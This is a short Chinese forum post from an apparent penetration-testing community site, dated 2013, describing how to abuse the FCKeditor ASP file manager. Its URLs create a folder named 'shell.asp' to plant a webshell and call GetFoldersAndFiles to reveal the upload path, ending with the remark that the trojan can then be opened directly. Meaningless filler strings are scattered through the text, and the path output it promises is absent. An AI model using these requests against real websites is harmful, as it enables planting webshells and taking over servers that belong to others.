中国网络渗透测试联盟

标题: fckeditor找上传路径方法 [打印本页]

---

作者: admin    时间: 2013-10-17 19:37
标题: fckeditor找上传路径方法
网上流行着是上传是这样子的
, w$ T8 W1 Q$ ]
http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
  j6 L  j, W- S3 j# z
上传后老找不到路径，测了一下，我发现
% I% u7 R1 g6 b/ C
FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

) s  \1 k% ^3 x3 E0 c可以爆出路径，显示以下内容
% |2 |" {: A7 q' Z( @: q8 v

得出路径，直接打开就见到马子
! Y4 d( X! L# D5 g1 y7 J

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2